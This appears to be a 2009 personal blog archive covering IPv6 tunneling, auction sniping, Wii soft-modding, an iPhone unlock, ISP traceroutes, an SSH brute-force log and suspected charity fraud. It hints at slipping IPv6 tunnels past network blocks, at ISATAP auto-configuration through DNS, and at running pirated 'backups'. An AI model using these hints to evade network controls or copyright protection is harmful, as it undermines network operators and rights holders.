IPv6 anytime

Having IPv6 connectivity is really sweet, at times. The preferred way would be a native connection, but since there are hardly any ISP offering IPv6 on their networks, one needs to tunnel.

Tunneling is basically accepting IPv6 traffic on a local interface, putting it into an IPv4 packet, sending it to a host in the Internet that does have IPv6 connectivity, unpacking the IPv6 packet out of the IPv4 container, and letting it go via the IPv6 network. Tunnel brokers like SiXXs & HE are really good for this. They offer free connectivity, clients, instructions and what have you not, to setup a nice Any to Any tunnel.

But when you are in a network that is somehow blocking tunneled IPv6, easily detectable by firewalls because it is marked as a protocol 41, you will not be able to setup your elegant tunnel. Public WiFi, hotels, companies, all sorts block protocol 41.

Luckily there are more options. One of the more stealthy methods is implemented in the Teredo tunnel. It is specifically designed to work behind NAT'ed devices, something the ISATAP router does not handle since it needs public IP connectivity. "Nice' thing about ISATAP is that Vista, 7 and windows 2008 machines will automatically configure an ISATAP interface when the name isatap is resolvable in the local domain [hint]. So if the record isatap.example.com IN A 1.1.1.100 exists, you're in business. But I digress.

Teredo is also implemented for free and automagically on your windows machines... IF they are not member of an Active Directory [hint]. It is also available for linux & BSD and there is a [old] implementation that runs on OSX [including Snow Leopard] too.

The name is not an incident either. As on WikiPedia: "The initial nickname of the Teredo tunneling protocol was shipworm. The idea was that the protocol would pierce holes through NAT devices, much like the shipworms bore tunnels through wood. Shipworms are responsible for the loss of very many wooden hulls, but Christian Huitema in the original draft noted that "the animal only survives in relatively clean and unpolluted water; its recent comeback in several Northern American harbors is a testimony to their newly retrieved cleanliness. Similarly, by piercing holes through NAT, the service would contribute to a newly retrieved transparency of the Internet."
Christian Huitema quickly changed the name to Teredo to avoid confusion with computer worms[2]. Teredo navalis is the Latin name of one of the best known species of shipworm."

The 'self healing capabilities' of 'the Internet' and the features in IPv6 especially, called Neighbor Discovery, open a whole class of challenges themselves. Initially for the network designers and operators but soon for malware writers too. Luckily the part of the RFC for IPv6's Type 0 Routing Header has already been depreciated. It made possible the good ol' source routing but then 88-fold amplification. It has been demonstrated at CanSecWest07 by Philippe Biondi & Arnaud Ebalard, they are the developers of 'scapy' a powerful interactive packet manipulation program.

Have fun and good luck getting packets flowing the way you like it.

Treasure hunting ;)

With the 'holiday season' coming up, buying presents is on it's all time high. I like buying presents. As a matter of fact, giving presents becomes more fun with age then receiving. I guess that dates me :)

With marktplaats in Holland & ebay as a global fleemarket, hunting for cheap stuff is easier then ever. But there is an angle to make it more fun, because paying too much is for tourists. So lets employ some good old SE on the matter.

A good lesson to start with is to get to know the subject. As an example let's use Steam Engines. The top of the world market is being served by the long standing traditional firm Wilesco. They've been in the steam engine market since [or slightly before] James Watt improved the concept of steam power to a useable level, and even have a Wiki page, in three languages, including Japanees [someone say market?] :)

Reading fan pages is a treasure trove of 'unwritten' useable information, mostly you will be looking for hobbyists and other self proclaimed experts.

Then it's time to scrunch the Internets. Hit graigslist, Marktplaats, Ricardo and other 'local' fleemarkets and compair the offers and prices with the 'global' ebay prices.

Of course, the Wilesco D32 is the all time classic, with prices ranging between 1.000 and 1.500 euroos. A super collectors item is the Wilesco R200 atomkraftwerk, rare & expensive. The top spots will be a rough market and not something we amateurs want to burn our fingers on with a first try.

Since the example of the Wilesco repairman deals with a D24, I propose we start hunting for a nicely priced D24. The D24 is a powerhouse. It is the steam engine with the largest cattle volume of the whole Wilesco range.

One of the cool features of the D32 is the controle panel, the D24 has that [smaller and less] too. See here:


Google "Wilesco D24" for starters and see what you come up with. Then do the same but on your local flee market and repeat it on the International ebay. There are some pretty astounding price differences to be observed. Certainly some of them can be explained based on quality and age but the local culture is a big factor too. Try to leverage that. Dealing with people from other countries used to be hard and painful. With the coming of the Internet and the disappearing of the borders in our global villages, things are getting easier by the day. Often sellers will even state if they will post items international and if they do not, a couple of words in their own language is a good starting point. I like to use google's translate for that purpose.

Very good [for you] deals can be made with people who do not know what they're dealing with. Tell tail signs are misspelled items, incorrectly labeled items [not mentioning the type in the description is sweet], lousy pictures [too much mess around the object, dark, unsharp] and people who are clearly selling stuff that is not theirs [from past away family members, NOT stolen stuff!].

A deadly sin and pit fall in the process is... making a bit.

Never ever make a bid. Do not even think about it. People are lemmings, once they see -you- making your bid, they will not hesitate to over bid. With most online flee markets I have seen it is easy to start an email or skype conversation that is out of sight of your fellow hunters. In case of ebay that is all nice and good but most sellers there do want you to bid. If it has to be, we will comply, but on our terms.

AuctionSniper is one such 'turn the table' tools. It allows for automatic & scheduled bidding. This is good for multiple reasons:
- it allows you to bid at the last second [no one can over bid]
- you do not have to sit behind your screen at odd times when specific auctions end
- most important: it takes the emotion out of your bidding

The emotion thing is where we are suckered into spending way too much on far too little. I will not even start giving examples ;) The cool feature of a scheduled bid is that it allows you to check your information sources, make up a price and forget about it. You will not get suckered into over bidding the guy who hunts for the same items and over bids you by 2 Euroos every time. No, you've set your price and either get it or do not.

I picked up a very decent D24 for <100 Euro. Sinterklaas will be proud to see the smile on the receivers face.

Happy hunting.

IPv6 work...ed!

Apple owners where responsible for a surprisingly large number [0.238 percent ] of IPv6 enabled google users. Thanks to the wizards at Cupertino, who decided on Infinite wisdom Loop to meddle with mDNSResponder so now it cancels the queries and shuts down the socket after the first responses are in. Big change these are A responses so the AAAA replies will be /dev/null'ed leaving the end user [application] with no option but to access the resource via... IPv4.

Mistakes happen, but with 10.6.2 the issue is still here.

The DHCPv6 client is not available for MAC users either, that does not help since it's basically required to play nice with ISP's and other large network operators [large[r] companies come to mind]. Neither is there a lot of documentation on the IPv6 implementation.

Finally improving the Apple Airports with [more complete] IPv6 support is a good thing... unfortunately: it is a New Feature and as such, will NOT be available for us loyal Apple hardware buyers. Only the currently for sale AirPort Extreme & Time Capsule are lucky enough to have this 'New Feature' so you're out of luck if you thought you could snatch up a 'cheap' AirPort Express: they do not have it.

So IPv6 on my beloved Apple setup is basically broken and the future looks dim. Microsoft is miles ahead with working IPv6 since Vista. Thank G*d not to many people read this since otherwise the street credibility of OSX would be down yet another point. Microsoft's DirectAccess could develop into the first IPv6 'killer app' and that both makes me happy [IPv6 FTW!] and sad: why my BSD based OS is not leader of the pack is beyond me, except that maybe, just maybe, IPv6 is really not as much in demand as I -think- hoped it was.

As a desert, I offer you a link that I missed before, but certainly love as much as a lot of the other work of the author.

Mod'ing for fun and pleasure

The PSP's the PS the Wii: all can be moded to allow for 'distributed backups' of your [owned OFC] games to be run. One of my daughters participated and won a contest last weekend and came home with a fresh Wii. Our first Wii we got from Austria via friends when it was just released 3 years ago and unobtainable here in Holland. The kids liked it alright, but after a couple of weeks the novelty was off and the Wii turned into a dust collector. We made someone very happy by selling it complete with the controllers, accessories & games right before new years eve.

So now, 3 years later we are the happy owners of a Wii again. It came with the usual Wii Sports game, but nothing more. Blast: the box comes with only one controller, and what is more exciting then beating someone in a heads on? So lets run out and get a second controller FAST.

Configuring & connecting the device is a brease although it is a pity there is no HDMI connectivity. After entering the 'WEP' password [riiiight] a whole Wii world opened up like a deja vu: the Wii shop & Wii credits! How could I have forgotten? Let's open the box of pandora and soft mod it first to be able to test drive some of these distributed backups first.

It takes the better part of an hour to finally get to the source of the homebrew scene. Just like most moding software, be it for the iPhone or Wii or any other device, there is people who are scamming their arses off and want to make you pay for download links and instructions. Somehow these dudes are such experts on SOE that they manage to basically p0wn the first page of google and make you navigate through all sorts of blogs, affiliation links and what not. After glancing over a page or 10 you get the idea of the gist of the basic requirements & tools like BannerBomb BootMii WiiKey and what have you not.

All pieces fall together when you find instructions in simple documents called README-HBC.txt and the like. The process is fairly simple:
Have & format your SD card, download and copy a couple of files, start the Wii, install the HomeBrew channel: done!

All in all it took longer to find the 'I accept all legal mumbo jumbo' agreement in the Wii menu to be able to access the online content of the original Wii channels then it took to mod the box. Now that Linux is running on the box, the kids can relax and spend their time breaking records & battling out competitions with friends for bragging rights.

Adam Curtis makes me want to delete this blog...

Adam Curtis: "The basic fact is they gave me a website on which I put up this film, It Felt Like A Kiss and things associated with it. When I'd done that they asked what I wanted to do next. They wanted me to all sorts of bloggy stuff and I just would not do that. I think that's so boring. It's noodling and doodling and it's exactly what I criticise the web for being - the idea that half formed, half, vague, badly researched aperçu, we used to call them, can be some new form of journalism."

Whatever happened to IPvSEXY?

IPv6 is needed, both readers of this blog know that, right? So how come the implementation is so slow?

Is it [at least locally here] the rules for lawful interception holding us back?
Is it again the question who pays for the huge investments for the equipment needed for lawful interception?
Is it the customer [me and you] not willing to pay for IPv6?
Or is it not ready for primetime?

There are hardly any technical reasons not to get wet your appetite. Or it must be for the lack of consumer grade [read cheep] hardware. Setup a tunnel in a minute and go!

But where does one go on the IPv6 Internet?

Google 'IPv6' and the first hit is the wikipedia entry for IPv6, the second is ipv6.org with the tempting page title "IPv6: The Next Generation Internet!" Sweet! But ever bothered to look at the content? It's older then my first born! It's totally outdated and not maintained. How's that for marketing?

Third hit, IPv6 (tutorial) - DD-WRT Wiki. Excellent! A cheap easy to get your hands on IPv6 able [WiFi] router. Ooops: "IPv6 is apparently NOT WORKING on all versions of DD-WRT version 24 (tested on RC5 and final). If you want IPv6 on v24, try one of the custom builds"

So, let's try another angle, google "IPv6 WRT54G" First hit leads to JoatWiki, stating "While the actual setup/configuration takes less than an hour if you know what you're doing, it make take a couple weekends to get up and running if you never done this sort of thing. You also run the risk of turning your WRT54G into a brick"

Hmm, hit two sounds promising: "Earthlink IPv6 in the Home" Earthlink being a large ISP in the US, surely offers something more useable then the 'do it wrong and you'll brick your device' right? Well, the footer of the page might dim that expectation a little: Last modified: Wed Jul 06 18:29:15 PDT 2005. 2005, that is like a million Internet years ago! The concept is to make it so simple that there is not even a possibility to login [http nor ssh nor telnet] to the box. That does not help unless you truly want to go IPv6 via earthlink and I do not since I am on the other end of the world.

But lets say you, as a dedicated hobbyist are not stopped by all the dead links and manual work to get your WRT54 up and running, or you're rich and just bought a Fritz 7270 and loaded the lab firmware version and get your IPv6 working, then what?

What is waiting out there for you? How will it feel to browse the Internet of the future? What prices will you be able to collect and pry the eyes of your friends? Hold tight, take a seat and look at these impressive numbers:

https://fit.nokia.com/lars/meter/ipv6.html

As Lars explains: "The scripts that update this page retrieve the names of the web sites that are most popular across the globe, as well as in select countries, from alexa.com in regular intervals. They then check whether the DNS entry for each site name reflects that it uses IPv6. The numbers above show the percentage of these top sites that are IPv6-enabled, as well as the absolute numbers."

There are about 200 [yes, two hundert] IPv6 enabled sites! In the IPv4 world, back when the Internet still was DARPA's that number was reached in 1983. Ok, I give it to you, I am comparing apples and oranges: the 200 number of IPv6 hosts are 'the most popular' sites and the 190 hosts are an absolute number, but it does show how PATHETICALLY slow IPv6 adaptation is.

We celebrate single 'well known' IPv4 hosts who are accessible via IPv6 by means of a proxy. WOW hold the presses, the eagle has landed!

At the same time, the one true IPv6 pushing ISP in Holland called XS4ALL has to STOP the rollout because Legal Interception is too costly.

But there must be good news? Any news? Well on the Dutch IPv6 taskforce site, there are a stunning 5 [yes five] links listed with IPv6 news...

But why trust me and my flakey and spotty observations! Let's find some smart guys who care and actually know things. Derek Morr for instance. On his [ice to read] blog called "Living with IPv6" he made some [wishful] predictions about IPv6 deployment in 2009 and some excellent observations of the lack of good IPv6 monitoring.

Let me wrap up by making some predictions for IPv6 metrics in December, 2009:

90% of top-level domains will have IPv6 glue in the root (right now, 75% do).
50% of the DNS root servers will support IPv6 (right now, 25% do)

At AMS-IX, 1% of traffic will be native IPv6.
1400 ASes will have IPv6 prefixes.
Europe will continue to have the most allocated and deployed IPv6.

The prediction for the AMS-IX is wrong. Currently it is about 0.3% IPv6 a far cry from the predicted 1%

What's wrong with these pictures:


Screenies taken about 3 months apart, left one first: 40.000 IPv6 domains 'disappeared' and IPv4 gained 40 days :D

Let's see what Derek Morr will come up with in a couple of months.

Bottom line: we have a need, we have a solution, we have [some] knowledge but our marketing is horrific, the customers [yes: you!] have no need and thus are not demanding [read: pay for] it. It is up to us [as ISP's and networkers as a whole] to get it out. There is good news too, of course. When you see CDN's like netflix implement IPv6 in 2 [yes, TWO!] months, you know it is realy possible... even if they too are a little scared to let 'normal' users access their service via IPv6 and 'hide it' in a IPv6 subdomain.

Pair that with this news flash: "In the first nine months of 2009, the American Registry for Internet Numbers (ARIN) received 300 requests from carriers for blocks of IPv6 address space. This compares to 250 requests received in all of 2008 and 2007." and it just looks like there is some real IPv6 work being done.

Now let's see how IPvSexy will actually make a real life comeback and forefil its destiny.

PS For those with love for numbers, the Ghost Route Hunter by SixXS is a must bookmark.

Posting drafts: duh!

It happens at moments I am not paying any real attention to the posting itself. Something arouses my typing finger and boom, off it goes. I forget a picture, links, spell chekcing, and post right out nonsense that is soo totally off the wall not even the conspiracy specialists see anything useful in it.

So what do you do with incorrectly posted material? Of course I have the option to alter the text and up scale it and even to retract it, but that feels like cheating. It's like clearing up that blatant hole 'someone' left in the firewall ruleset and silently close it... it's just wrong. It's wrong because errors are an excellent stepping stone to knowledge.

As a rule I like asking the people I work for|with "So how many major incidents have you seen lately". The answer is often more revealing then one might expect. The classics are "None!" and "Define incident" and "That is classified". The one I really like is "One major last 6 to 12 months".

Companies claiming 'none' are more at risk then the others. Thing -do- go wrong and you not knowing is plain dangerous. The people asking for clarification work in a back stabbing culture where bad news shall and will be punished and thus manipulated till the color scheme of the report is all white, yellow and green. The final answer "one" gives me an indication that "major incident" is a weighted value where the worst incident of the year is major, a nice relative scale that I feel most comfortable with. Threats and risk do change, no matter what metrics one uses, no matter how many 'risk managers' and 'risk analysis standards' one uses.

Good [and a little lucky] security officers have the gift to correctly context incidents and know when things are really going down hill and when incidents are more defcon red in the political arena. Both requiere a different approach and a different toolset. Most of us love technology issues:
- Man in the Browser
- Sly holes in firewall
- Rogue route advertisements
- Script kidies
- Lack of bandwidth
- Application layer exploits
- Arp storms

These are in our comfort zone, we deal with them daily and enjoy the puzzle and the diffs we see in the pre and after traffic dumps. A few people I have met in the availability scene like the part of corporate culture where the presentations kick in. The moments of debriefing not-so-hot technical aspects to people who know more about golfclubs then we know about ASM. However, more often then not, that is where the real difference is made: they p0wn the resources and set the priorities.

So when I go out and look for a person to lead the availability department, I look for the person who gets his coffee from the machine that is closest to the techies. The person who actually gets the autistic CCIE to share anecdotes about his holiday and at the same time dares to make a remark about the drawing at the whiteboard.

They're few and far between but easy to spot as they stand out like wolf among sheep.

PS Click on the picture. It will take you to a free download of the whole album of 'The Slew'. A band that just loves to mingle rock, instruments & DJ's in a refreshing mix that is a perfect example how a healthy mix of different 'character & ability' upscales the individual parts of the sum.

IPv6? Nowhere to be found!

IPv6 has basically disappeared from the wireless router landscape. Try finding a current one < 100 euro. Except for some obscure releases, like the DIR-615 Wireless b/g/n Router but only the hardware revision C with firmware 3.01

Hard to find, and certainly online nearly impossible to get any assurance about the hardware revision level.

Oh wait, my good old loyal WRTG54 [V4 with plenty of RAM] to the rescue! Oh no, not now, with the current 2.6 kernel and the open source b43 broadcom chipset and it's issues. Only with kernel 2.4 and it's 'limited' IPv6 support. You can roll your own WRT54 dd-wrt, if you feel adventures but the drawback is that there is no way to use the GUI. Not a nice plan if you plan to send the devices to parts far far away from home to end users.

There is the Fritz!Box 7270 but that goes for about 200 euro. That is nearly Cisco level pricing. And only with a lab release of the firmware, that is RC in dialect in the rest of the software world. Cisco of course does support IPv6 too but using the word Cisco and a price tag of <100 is like demanding justice from a African dictator.

So is there no solution? Oddly enough, there is... and it is produced by Apple: the AirPort Extreme [ and the AirPort TimeCapsule but for a >100 price tag]. Unfortunately there are gazillion stability issues specially in combination with Apple MBP's but they do IPv6 well with a simple interface.

Frustrating.

Not too bad! Native IPv6 ADSL for 7 euroos a month.
http://www.introweb.net/producten/categorien/internet_toegang/economy_adsl/ipv6_adsl.shtml

And Fritz!Box 7270 is indeed the only commercial IPv6 enabled home grade device available, also used by XS4ALL

DE DICHTER

na een dampend optreden
aanbeden door een uitverkochte menigte
de zoete geur van succes in de hersenpan
viel het de dichter tegen
dat niemand op de Afsluitdijk
met vlaggetjes staat te zwaaien

die eens zo toegejuigde aanbedene
vermakelijke tot nadenken stemmende hersenspoelende
alle handen opelkaar gekregene
zet thuis de televisie an
as een uitgebluste brandweerman

ton lebbink

IPv6

Finally!

http://[2a01:198:200:5e4::2]/

SixXs tunnel, not native yet, how on earth is it possible that LARGE colocs still do not support native IPv6?
No AAAA record yet, how on earth is it possible that LARGE registars still do not support IPv6?
No native IPv6 from my ISP, how on earth is it possible that LARGE IPS's still do not support native IPv6?

Like John Curran makes clear, it has to be "the boy that cried wolf" syndrom. See for yourself:

UPC throttling ALL traffic, not specific.

Of course QoS is important to the customer. I am one myself. I like getting what I pay for. I understand Internet traffic costs money and I am [willingly] paying for it. So when UPC decided to cut all bandwidth between 12:00 and 00:00 by 2/3 to ensure the QoS for all customers would be able to enjoy Internet access at expected speeds, I was a little worried.

Well, my browsing the Internet experience has not changed too much.

But what did change a lot was my usenet experience. Is : Download speed: 638.85 KB/s Was: [Avg-Speed]: 1895kB/s. That is drastic but expected, right? WRONG.

UPC is not just throttling Internet access, it throttles ALL traffic.

My traceroute [v0.75]
macbookpro-meij-net.local (0.0.0.0) Mon Aug 24 22:59:35 2009
Keys: Help Display mode Restart statistics Order of fields quit
Packets Pings
Host Loss% Snt Last Avg Best Wrst StDev
1. 10.0.1.1 0.0% 455 1.2 1.3 0.7 14.7 1.5
2. 10.15.158.129 0.0% 455 4.4 8.4 2.6 34.3 4.1
3. p21161.net.upc.nl 0.0% 455 6.7 10.6 4.2 57.0 7.0
4. 84.116.131.21 0.0% 455 5.7 13.9 4.6 78.4 12.6
5. 10ge-upc.xmr16-1.ams5.as5580.net 0.0% 454 12.2 14.0 5.0 47.6 6.0
6. ???

My usenet traffic never hits 'the Internet', it goes straight out to XSNews. XSNews is my current [and good!] usenet provider. I hope they will resolve this issue with UPC.

All your secrets are belong to us

Nifty site ;)

Specially when people use their GPS enabled cams

Ze Frank in Amsterdam!

I am sure all who read this know Ze Frank and spent countless hours in awe and amassment . If you do not, shame on you! Go google the master. But do not take my word for it, read what Scot Trent has to say: "By the Keillor standard of diversity, intelligence, and talent, ze Frank sings, composes, has a depth beyond most of us and is more prolific than any one person."

So this week [Friday the 21st.] Ze Frank be in Amsterdam on the "Pluk de nacht" festival.

iPhone + redsn0w == Waiting for reboot SOLVED!

It took me the better part of a full day, lots of google hits, lots of options, lots of everything.

First, make sure you got the proper files [# openssl sha1 'filename']:
iPhone1,1_3.0_7A341_Restore.ipsw SHA1 2afd3f8ede17390737f508473ed205506a0bd23f
bl39.bin SHA1 8ec565fe026d3f642dbe836c0fdc80f06844603b
bl46.bin SHA1 fd4825ffe5727dcc30e4c70dc78908838d498822
[not too many people care about these it seems...]

And the real solution was simpler then anything: While redsn0w shows the dreaded "waiting for reboot" screen, just unplug the USB cable and replug it. done. all fine. iPhone unlocked and updated to version 3.0.1

Thanks to iLeoMarc on the macrumurs forums.

Not found by google?

There are some queries that google has only one answer for, some are here.

"mokum's iphone" is one. In the [faint] hope that someone will once type "mokum's iPhone" in google after laying her|his hands on my phone and trying to find the original owner, now you got a change. Contact me and I am sure we will work out a deal that satisfies all involved parties.

Having said that, I would like a moment to thank Apple, GeoHot & the iPhone dev-team for letting me and many others use this amazing device, with any provider -I- like.

And another one, while messing with remote syslog on OSX:
syslogd 31783 FS_WRITE_DATA SBF /private/var/log/asl/StoreData
FS_WRITE_DATA SBF /private/var/log/asl/StoreData 13 (seatbelt)

OpenDNS, in Holland soon.

Some days ago I read something about OpenDNS [thinking of] getting a new location [AMS-IX] for their excellent DNS service. Since it is based on anycast, endusers need not to change any addresses in order to benefit from the added location. Silly me, I can't find the article anymore.

Last week I had some issues with slow dns lookups/slow Internet on Leopard again. It is plagued with issues. My setup with an Apple Airport and Apple iPhones, and an iMAC, a G4 & more [all running 10.5.7] is often experiencing issues with name resolving. Unfortunately, I am not the only one with this. I have googled my arse off and tried every 'tip' I found, from turning of ipv6 in Firefox & the Airport & on my laptop to moving the resolving from my laptop to the Airport. Nothing works reliable.

Last week however the issue was another:

My traceroute [v0.75] macbookpro-meij-net.local (0.0.0.0) Thu Jul 30 01:40:51 2009 Keys: Help Display mode Restart statistics Order of fields quit Packets Pings Host Loss% Snt Last Avg Best Wrst StDev

1. 10.0.1.1 0.0% 96 1.0 1.3 0.7 4.2 0.7

2. 10.15.158.129 0.0% 96 8.3 9.7 6.8 33.1 3.8

3. 212.142.21.161 0.0% 96 69.4 12.1 7.6 69.4 8.5

4. 212.142.32.65 0.0% 96 13.3 11.3 7.0 32.2 3.5

5. 213.46.183.93 82.1% 96 8.9 11.7 8.3 24.5 4.5

6. 84.116.131.6 87.4% 96 10.0 12.2 8.9 31.8 6.3

7. 213.46.183.93 80.2% 96 9.1 10.5 8.2 18.8 2.7

8. 84.116.131.6 95.8% 96 19.2 15.0 11.6 19.2 4.0

9. 213.46.183.93 82.3% 96 16.8 11.9 8.9 20.6 3.5

10. 84.116.131.6 93.7% 96 9.0 12.5 9.0 26.8 7.0

11. 213.46.183.93 82.3% 96 10.3 11.8 8.4 31.6 5.6

12. 84.116.131.6 95.7% 95 9.4 12.3 9.4 17.4 3.7

13. 213.46.183.93 76.5% 86 9.9 13.0 8.9 33.5 6.5

14. ???

15. 213.46.183.93 83.5% 80 11.8 10.5 8.7 12.3 1.2

16. ???

17. 213.46.183.93 82.9% 77 10.6 10.3 8.2 16.7 2.2

18. 84.116.131.6 95.7% 24 11.7 11.7 11.7 11.7 0.0

A simple routing loop at my provider. It took me over 30 minutes to find, focused as I was on the 'normal' DNS problems with OSX. Only after the reliable 'turn Airport off' & 'turn Airport on' trick did not work I checked the availability of the OpenDNS servers...

Other sillies with OSX:

- Calling an IP address in the 169.254./16 range 'self assigned' even if you get it from a DHCP server

- Falling back to 'old' IP addresses even if a new lease has been accepted and used

- Slow poke ethernet link setup [need to nail arp settings to flash routers fast enough]

Israel distributes libido-increasing gum, and I want some!

Hamas: Israel distributes libido-increasing gum in Gaza

Islamist group claims Israeli intelligence operatives transfer merchandise to Gaza dealers that increases sex drive, even encourage them to distribute them free of charge in order 'to destroy' young generation. Affair exposed after young girl chews gum, complains of bizarre side effects

Is Israel targeting the Palestinian population in Gaza by distributing libido-increasing chewing gum in the Strip? A Hamas police spokesman in the Gaza Strip Islam Shahwan claimed Monday that Israeli intelligence operatives are attempting to "destroy" the young generation by distributing such materials in the coastal enclave.

Shahwan said that the police got their hands on gum that increases sexual desire that, according to him, reaches merchants in the Strip by way of the border crossings. According to him, a Palestinian drug dealer admitted that he sold products that increase sex drive. The dealer said that he received the materials from Israeli sources by way of the Karni crossing.

A number of suspects have been arrested.

The affair was exposed when a Palestinian filed a complaint that his daughter chewed the aforementioned gum and experienced the dubious side effects.

Shahwan even claimed that Israeli intelligence operatives encourage dealers in Gaza to distribute the gum for free.

"The Israelis seek to destroy the Palestinians' social infrastructure with these products and to hurt the young generation by distributing drugs and sex stimulants," said Shahwan.

However, he noted that drugs reach the Gaza Strip by way of Rafah tunnels, and said that the police keep a close watch on the illegal activities going on in the tunnels between Gaza and Egypt.

Shahwan added that the police have recently seized large amounts of drugs and alcohol attached to the underside of automobiles passing through Erez crossing. The automobile owners admitted receiving help for smuggling the materials from Israeli intelligence operatives.

Ali Waked

Israel News

Watson Research Center ssh scan

# grep "129.34.3.3" /var/log/messages

Jul 11 15:31:50 meij sshd[19894]: Failed password for root from 129.34.3.3 port 35477 ssh2

Jul 11 15:31:51 meij sshd[19896]: Failed password for root from 129.34.3.3 port 35702 ssh2

Jul 11 15:31:52 meij sshd[19898]: Failed password for root from 129.34.3.3 port 35873 ssh2

Jul 11 15:31:53 meij sshd[19900]: Failed password for root from 129.34.3.3 port 36003 ssh2

Jul 11 15:31:54 meij sshd[19902]: Failed password for root from 129.34.3.3 port 36177 ssh2

Jul 11 15:31:55 meij sshd[19904]: Failed password for root from 129.34.3.3 port 36332 ssh2

Jul 11 15:31:57 meij sshd[19906]: Failed password for root from 129.34.3.3 port 36462 ssh2

Jul 11 15:31:57 meij denyhosts: Added the following hosts to /etc/hosts.deny - 129.34.3.3 (vserv.watson.ibm.com)

Jul 11 15:31:58 meij sshd[19913]: Failed password for root from 129.34.3.3 port 36666 ssh2

Jul 11 15:31:59 meij sshd[19915]: Failed password for root from 129.34.3.3 port 36795 ssh2

Jul 11 15:32:00 meij sshd[19917]: Failed password for root from 129.34.3.3 port 36937 ssh2

Jul 11 15:32:01 meij sshd[19919]: Failed password for root from 129.34.3.3 port 37086 ssh2

Jul 11 15:32:02 meij sshd[19921]: Failed password for root from 129.34.3.3 port 37215 ssh2

Jul 11 15:32:03 meij sshd[19923]: Failed password for root from 129.34.3.3 port 37333 ssh2

Jul 11 15:32:04 meij sshd[19925]: Invalid user oracle from 129.34.3.3

Jul 11 15:32:04 meij sshd[19925]: Failed password for invalid user oracle from 129.34.3.3 port 37454 ssh2

Jul 11 15:32:05 meij sshd[19927]: Invalid user test from 129.34.3.3

Jul 11 15:32:05 meij sshd[19927]: Failed password for invalid user test from 129.34.3.3 port 37538 ssh2

Unfortunatly there is more amiss at IBM's Watson Research Center:

The original message was received at Mon, 13 Jul 2009 09:11:05 -0400
from spamguru010.watson.ibm.com [9.2.250.70]

----- The following addresses had permanent fatal errors -----
< nrt@watson.ibm.com>
(reason: 550 Host unknown)

----- Transcript of session follows -----
554 5.0.0 Service smokum@gmail.com unknown
550 5.1.2 <nrt@watson.ibm.com>... Host unknown (Name server: -f: host not found)

Final-Recipient: RFC822; nrt@watson.ibm.com
X-Actual-Recipient: RFC822; nrt@mailhub4.watson.ibm.com
Action: failed
Status: 5.1.2
Remote-MTA: DNS; -f
Diagnostic-Code: X-Unix; 550 Host unknown
Last-Attempt-Date: Mon, 13 Jul 2009 09:11:06 -0400

So I guess they'll need to read this blog to find out about their issues ;)

Good luck

USENET but then FASTER: tsunami-udp FTW!

Downloading data via USENET has become the default FAST track for most DSL|Cable users. The data is nicely placed 'locally' and for a small fee, one gets priority access for 4, 8 or however many connections. Nice. Much faster then the old single-sourced-http access or the newer multiple-source-bittorent [too many cheaters in bittorent country who who do not obey to the rule that one should at least have a share ratio of 1:1.20 or better].

Cool, so now we finally get to use all the bandwidth we pay the ISP for. But since the USENET servers are useualy close to the endpoint, the need for a connection oriented protocol like TCP is hard to make. UDP is a cheaper protocol and thus could increase the effective bandwidth since it requiers less 'overhead'. The old fasioned reasoning for using TCP over UDP is that UDP is only usefull for transmissions where order isn't important and you don't need all of the messages to get to the other machine.

Other reasons for using TCP over UDP are that the upstream application needs less state awareness and since we like our coders dumb, we take that burden off of them.

But since our USENET servers are close, packetloss is not much of an issue. It is far more exceptional to loose packets. In the rare case we do, we could simply ask for a resent of that particular packet [or block].

So I went to BING [I have to admit I am impressed by the google-like results!] and asked "when is tcp better then udp" Hardly anything interesting showed at first glance. I repeated the same question to GOOGLE, more 'good' material was listed at first, but still not what I was looking for. BING has been setup to give me 100 results so I took a second look and found at hit 38 tsunami-udp.

In pseudo-code, the server and client operate approximately like this:

**Server**

start

while(running) {

wait(new incoming client TCP connection)

fork server process:

[

check_authenticate(MD5, "kitten");

exchange settings and values with client;

while(live) {

wait(request, nonblocking)

switch(request) {

case no request received yet: { send next block in sequence; }

case request_stop: { close file, clean up; exit; }

case request_retransmit: { send requested blocks; }

}

sleep(throttling)

}

]

}

**Client**

start, show command line

while(running) {

read user command;

switch(command) {

case command_exit: { clean up; exit; }

case command_set: { edit the specified parameter; }

case command_connect: { TCP connect to server; auth; protocol version compare;

send some parameters; }

case command_get && connected: {

send get-file request containing all transfer parameters;

read server response - filesize, block count;

initialize bit array of received blocks, allocate retransmit list;

start separate disk I/O thread;

while (not received all blocks yet) {

receive_UDP();

if timeout { send retransmit request(); }

if block not marked as received yet in the bit array {

pass block to I/O thread for later writing to disk;

if block nr > expected block { add intermediate blocks to retransmit list; }

}

if it is time {

process retransmit list, send assembled request_retransmit to server;

send updated statistics to server, print to screen;

}

}

send request_stop;

sync with disk I/O, finalize, clean up;

}

case command_help: { display available commands etc; }

}

}

It combines the strength of TCP [reliable data transfer] with the efficiency of UDP [no handshakes etc].

How It Works:

Tsunami performs a file transfer by sectioning the file into numbered blocks of usually 32kB size. Communication between the client and server applications flows over a low bandwidth TCP connection. The bulk data is transferred over UDP.

Most of the protocol intelligence is worked into the client code - the server simply sends out all blocks, and resends blocks that the client requests. The client specifies nearly all parameters of the transfer, such as the requested file name, target data rate, blocksize, target port, congestion behaviour, etc, and controls which blocks are requested from the server and when these requests are sent.

Peace Future School defrauding kids?

Someone thought it a good idea to help African people in & outside Africa and to do so, collect money from others. But how to get people to give you money? Well, one soft target are kids. So when you have a volunteer working for you who is linked to a school, why not use that opportunity?

So you register a site, copy the content [one page] of another site and sit back watching the kids donating money. Simple & potentially effective. Until a parent gets a little suspicious and decides to contact the school and ask them what this is all about. As it happens, the school knew as little as what the copied one paged website let them know: nothing really.

Another parent used some who is, some google-fu, some Maltego & some RL contacts in the fraud business. Everything found smells fishy, except the person who claims to be behind the Peace Future School. They go to extended lengths to assure the doubters that all is very legit, all is being done in good faith, there is no official registration YET, but surely that will be done one day, there is no content for the site YET but that too is on it's way, there are many trustworthy people behind the project but not one links from their site to the Peace Future School YET but that will surely come.

But what is the truth? Is it just a bunch of innocent people who do not know how to setup a reliable looking site or are they fraudsters? I leave the verdict up to you, but for my kids there is no way they are going to be giving money to this particular initiative. No matter how much private money the spokeswoman claims to have spend on it, no matter how many well connected people she claims are behind it, no matter how strange and surprising it was to all volunteers that people are doubting, no matter how sad it makes her Nigerian partners to be confronted with suspicion, no matter how many volunteers are emailing from free email addresses.

